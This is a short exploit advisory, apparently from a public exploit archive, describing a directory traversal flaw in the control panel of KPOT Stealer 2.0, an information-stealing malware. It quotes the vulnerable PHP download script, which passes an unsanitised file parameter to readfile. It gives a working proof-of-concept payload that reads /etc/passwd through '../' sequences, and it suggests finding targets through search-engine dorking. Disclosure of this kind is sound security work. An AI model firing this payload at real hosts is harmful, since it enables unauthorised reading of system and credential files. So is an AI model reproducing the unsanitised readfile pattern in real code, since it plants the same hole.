Authored by indoushka

KPOT Stealer CMS 2.0 suffers from a directory traversal vulnerability.

====================================================================================================================================
| # Title : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine

[+] onfected file: download.php

<?php
if (isset($_GET['file']))
{
$file = $_GET['file'];
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Content-Length: ' . filesize($file));
readfile($file);
}
?>

[+] use payload : download.php?file=../../../../../../../../../etc/passwd

[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwd

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================